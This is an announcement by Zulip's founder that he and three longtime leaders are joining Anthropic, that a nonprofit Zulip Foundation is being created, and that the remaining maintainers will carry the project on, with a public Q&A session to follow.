I’m stepping back from Zulip to join Anthropic because of its remarkable commitment to the responsible development of AI for the long-term benefit of humanity. Three additional members of Zulip’s longtime leadership team are also joining me at Anthropic: Alya Abbott, Greg Price, and Alex Vandiver.
My career choices have always been motivated by a sense of responsibility to use my talents for the public benefit. This motivation is what led me to found Zulip and lead it for a decade with our unusual values-focused approach. I remain committed to Zulip and its mission, and had imagined spending the rest of my career working on it. So what changed?
Over the last few months, I’ve been reflecting deeply on the myriad ways in which AI is changing the world, and how it might change the world in the future. And I came to the conclusion that it’s vitally important that we navigate this strange adolescence of technology well, and that I should contribute to this cause more directly than I ever could as the CEO of Kandra Labs.
My non-negotiable requirement for moving on from Zulip has always been ensuring that Zulip can continue its mission effectively without me. I’m deeply grateful to be in a position to do exactly that by creating the nonprofit Zulip Foundation.
Zulip’s team of professional maintainers
All Kandra Labs team members who are not joining Anthropic will continue working on Zulip. These 12 amazing people have an average of over 4 years of professional experience working on Zulip, and almost 25,000 Zulip commits between them. They have shipped major improvements end-to-end across every facet of the product, and I have full confidence in their ability to move the project forward.
Ultimately, Zulip’s strength is its culture and incredibly disciplined development process. The team has demonstrated the ability to operate and develop Zulip without me during the six months of my parental leave (spread across my three kids). I’ve never shared this so publicly before, but in 2018 I developed a chronic illness that was initially highly debilitating, and continued to impact my work until last year. Yet our wonderful team and community made steady progress even through the worst of it.
Over the coming months, the team will be hiring to fill roles opened by the departures. If you or someone you know may be interested in a leadership or infrastructure role, learn more and reach out!
I personally expect to remain involved with Zulip as a contributor, providing context, history, reviews, and advice as time permits.
Reach out!
While I’m excited for Zulip’s future, I know folks will have lots of questions about what it all means. Our team would love to answer them as transparently as we can. We invite everyone to join us for a live chat Q&A in the Zulip development community on Tuesday, May 19 at 4 PM UTC (9 AM US Pacific / 12 PM US Eastern / 9:30 PM IST).
If you have any questions or concerns as a Zulip customer, please contact support@zulip.com. As always, all are welcome to drop by the Zulip development community — the #general channel is a great place to ask about this transition.